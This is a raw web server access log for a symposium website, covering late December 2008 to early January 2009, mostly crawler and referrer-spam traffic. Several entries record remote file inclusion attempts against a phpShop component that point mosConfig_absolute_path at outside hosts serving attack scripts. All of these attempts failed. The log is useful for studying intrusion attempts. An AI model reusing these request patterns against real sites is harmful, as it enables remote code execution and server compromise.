193.86.246.132 - - [30/Dec/2008:05:22:49 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 www.geil-symposium.com
193.86.246.132 - - [30/Dec/2008:05:22:49 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 www.geil-symposium.com
200.199.205.47 - - [30/Dec/2008:05:23:32 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
200.199.205.47 - - [30/Dec/2008:05:23:32 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
200.199.205.47 - - [30/Dec/2008:05:23:32 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
82.200.128.230 - - [30/Dec/2008:05:46:38 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
82.200.128.230 - - [30/Dec/2008:05:46:38 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
82.200.128.230 - - [30/Dec/2008:05:46:38 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
38.99.13.124 - - [30/Dec/2008:06:43:57 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
87.101.4.49 - - [30/Dec/2008:09:02:32 -0500] "GET /logs/error.log//com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
87.101.4.49 - - [30/Dec/2008:09:02:32 -0500] "GET //com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
87.101.4.49 - - [30/Dec/2008:09:02:32 -0500] "GET /logs//com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.145.17.190 - - [30/Dec/2008:09:27:37 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
216.145.17.190 - - [30/Dec/2008:09:27:37 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
67.195.37.156 - - [30/Dec/2008:11:09:58 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [30/Dec/2008:11:09:58 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [30/Dec/2008:11:10:08 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.32.49 - - [30/Dec/2008:12:45:18 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [30/Dec/2008:14:10:31 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
131.107.151.157 - - [30/Dec/2008:18:28:25 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
72.30.65.26 - - [30/Dec/2008:18:40:44 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.26 - - [30/Dec/2008:18:40:44 -0500] "GET /logs/error.log HTTP/1.0" 200 197377 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.48 - - [30/Dec/2008:19:07:33 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {8E2DBC6E-56F4-8E9B-ED3D-D5422D593739}; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.80.194.34 - - [30/Dec/2008:23:05:14 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; Comcast Install 1.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3; IEMB3)" 0 www.geil-symposium.com
61.135.249.209 - - [31/Dec/2008:01:33:15 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
61.135.249.209 - - [31/Dec/2008:01:33:16 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:07:00:39 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:07:00:42 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:09:04:02 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:09:04:08 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
222.72.132.166 - - [31/Dec/2008:10:06:23 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
78.84.0.205 - - [31/Dec/2008:10:06:25 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/purchasepropeciahere" "Opera/9.00 (Windows NT 5.1; U; ru)" 0 www.geil-symposium.com
78.84.0.205 - - [31/Dec/2008:10:06:26 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/purchasepropeciahere" "Opera/9.00 (Windows NT 5.1; U; ru)" 0 www.geil-symposium.com
222.72.132.166 - - [31/Dec/2008:10:06:26 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
222.72.132.166 - - [31/Dec/2008:10:06:28 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
222.72.132.166 - - [31/Dec/2008:10:06:30 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
68.114.43.196 - - [31/Dec/2008:10:06:36 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/purchasepropeciahere" "Opera/9.00 (Windows NT 5.1; U; ru)" 0 www.geil-symposium.com
68.114.43.196 - - [31/Dec/2008:10:06:40 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/purchasepropeciahere" "Opera/9.00 (Windows NT 5.1; U; ru)" 0 www.geil-symposium.com
58.61.164.40 - - [31/Dec/2008:10:12:37 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [31/Dec/2008:11:08:06 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
61.135.168.39 - - [31/Dec/2008:11:11:04 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:11:33:01 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:11:33:05 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
84.54.137.9 - - [31/Dec/2008:12:37:32 -0500] "GET /logs/error.log///components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
84.54.137.9 - - [31/Dec/2008:12:37:33 -0500] "GET ///components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
67.201.13.98 - - [31/Dec/2008:13:22:04 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" 0 www.geil-symposium.com
67.201.13.98 - - [31/Dec/2008:13:22:04 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" 0 www.geil-symposium.com
193.47.80.36 - - [31/Dec/2008:14:16:09 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [31/Dec/2008:14:16:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:14:33:43 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:14:33:48 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
194.72.238.61 - - [31/Dec/2008:14:44:11 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)" 0 www.geil-symposium.com
208.80.194.41 - - [31/Dec/2008:19:41:12 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; myVine.com custom settings; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
66.249.71.103 - - [31/Dec/2008:19:59:33 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.103 - - [31/Dec/2008:19:59:33 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:20:48:22 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [31/Dec/2008:20:48:27 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
78.41.158.11 - - [31/Dec/2008:21:45:52 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "HouxouCrawler/Nutch-0.9 (houxou.com's nutch-based crawler which serves special interest on-line communities; http://www.houxou.com/crawler; crawler at houxou dot com)" 0 www.geil-symposium.com
78.41.158.11 - - [31/Dec/2008:21:45:52 -0500] "GET /Registration.html HTTP/1.0" 404 - "-" "HouxouCrawler/Nutch-0.9 (houxou.com's nutch-based crawler which serves special interest on-line communities; http://www.houxou.com/crawler; crawler at houxou dot com)" 0 www.geil-symposium.com
208.80.194.36 - - [31/Dec/2008:23:18:16 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative; yplus 5.1.02b)" 0 www.geil-symposium.com
208.111.154.15 - - [31/Dec/2008:23:23:30 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [31/Dec/2008:23:23:30 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
61.135.168.39 - - [01/Jan/2009:02:07:49 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [01/Jan/2009:02:08:30 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
38.99.13.124 - - [01/Jan/2009:05:40:29 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
66.232.111.94 - - [01/Jan/2009:08:08:49 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.232.111.94 - - [01/Jan/2009:08:08:49 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.232.111.94 - - [01/Jan/2009:08:08:49 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
124.115.0.138 - - [01/Jan/2009:08:09:34 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.138 - - [01/Jan/2009:08:09:34 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
208.111.154.16 - - [01/Jan/2009:10:26:51 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
76.65.76.201 - - [01/Jan/2009:14:12:17 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
76.65.76.201 - - [01/Jan/2009:14:12:19 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
220.181.32.22 - - [01/Jan/2009:17:11:25 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [01/Jan/2009:19:09:11 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.80.194.36 - - [01/Jan/2009:19:21:56 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; (R1 1.5); .NET CLR 1.1.4322)" 0 www.geil-symposium.com
78.41.158.20 - - [01/Jan/2009:22:28:52 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "HouxouCrawler/Nutch-0.9 (houxou.com's nutch-based crawler which serves special interest on-line communities; http://www.houxou.com/crawler; crawler at houxou dot com)" 0 www.geil-symposium.com
78.41.158.20 - - [01/Jan/2009:22:28:52 -0500] "GET /Registration.html HTTP/1.0" 404 - "-" "HouxouCrawler/Nutch-0.9 (houxou.com's nutch-based crawler which serves special interest on-line communities; http://www.houxou.com/crawler; crawler at houxou dot com)" 0 www.geil-symposium.com
212.95.54.42 - - [02/Jan/2009:02:07:39 -0500] "GET / HTTP/1.0" 200 310 "http://GEIL-SYMPOSIUM.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 0 www.geil-symposium.com
66.235.124.38 - - [02/Jan/2009:05:35:09 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [02/Jan/2009:05:35:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
193.47.80.36 - - [02/Jan/2009:08:55:38 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [02/Jan/2009:08:55:39 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
208.80.194.44 - - [02/Jan/2009:09:11:54 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 www.geil-symposium.com
208.111.154.15 - - [02/Jan/2009:09:20:13 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [02/Jan/2009:09:20:13 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [02/Jan/2009:14:15:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.8.124 - - [02/Jan/2009:15:21:45 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.124 - - [02/Jan/2009:15:21:45 -0500] "GET /logs/access.log HTTP/1.0" 200 267580 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
65.55.209.22 - - [02/Jan/2009:16:16:50 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.209.22 - - [02/Jan/2009:16:16:51 -0500] "GET / HTTP/1.1" 200 326 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
74.6.8.124 - - [02/Jan/2009:19:44:29 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.124 - - [02/Jan/2009:19:44:29 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.124 - - [02/Jan/2009:19:44:30 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.52 - - [02/Jan/2009:20:07:41 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; HbTools 4.7.5; ZangoToolbar 4.8.2)" 0 www.geil-symposium.com
220.181.32.49 - - [02/Jan/2009:20:44:41 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
75.49.38.136 - - [02/Jan/2009:21:04:50 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" 0 www.geil-symposium.com
220.181.32.77 - - [02/Jan/2009:21:17:49 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.80.194.35 - - [02/Jan/2009:23:43:33 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; InfoPath.2; .NET CLR 1.1.4322; IEMB3)" 0 www.geil-symposium.com
203.209.252.68 - - [03/Jan/2009:02:55:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [03/Jan/2009:02:55:57 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
38.99.13.124 - - [03/Jan/2009:04:41:25 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
61.135.168.39 - - [03/Jan/2009:05:08:48 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [03/Jan/2009:05:09:19 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
114.111.36.26 - - [03/Jan/2009:05:28:07 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
114.111.36.26 - - [03/Jan/2009:05:28:27 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Jan/2009:05:47:22 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.8.124 - - [03/Jan/2009:08:12:39 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.124 - - [03/Jan/2009:08:12:41 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.124 - - [03/Jan/2009:10:12:40 -0500] "GET /logs/error.log HTTP/1.0" 200 203735 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.32.49 - - [03/Jan/2009:13:12:10 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.111.154.15 - - [03/Jan/2009:16:16:50 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Jan/2009:16:16:50 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
58.61.164.40 - - [03/Jan/2009:16:47:49 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
66.249.71.104 - - [03/Jan/2009:19:04:14 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.104 - - [03/Jan/2009:19:04:14 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.103 - - [03/Jan/2009:19:04:14 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
61.135.168.39 - - [03/Jan/2009:20:08:14 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.80.194.45 - - [03/Jan/2009:20:12:55 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; NAFCPL; NAFCPL)" 0 www.geil-symposium.com
193.47.80.36 - - [03/Jan/2009:21:47:22 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [03/Jan/2009:21:47:22 -0500] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
67.195.37.156 - - [03/Jan/2009:23:50:43 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [03/Jan/2009:23:50:44 -0500] "GET /logs/access.log HTTP/1.0" 200 273804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:00:21:06 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
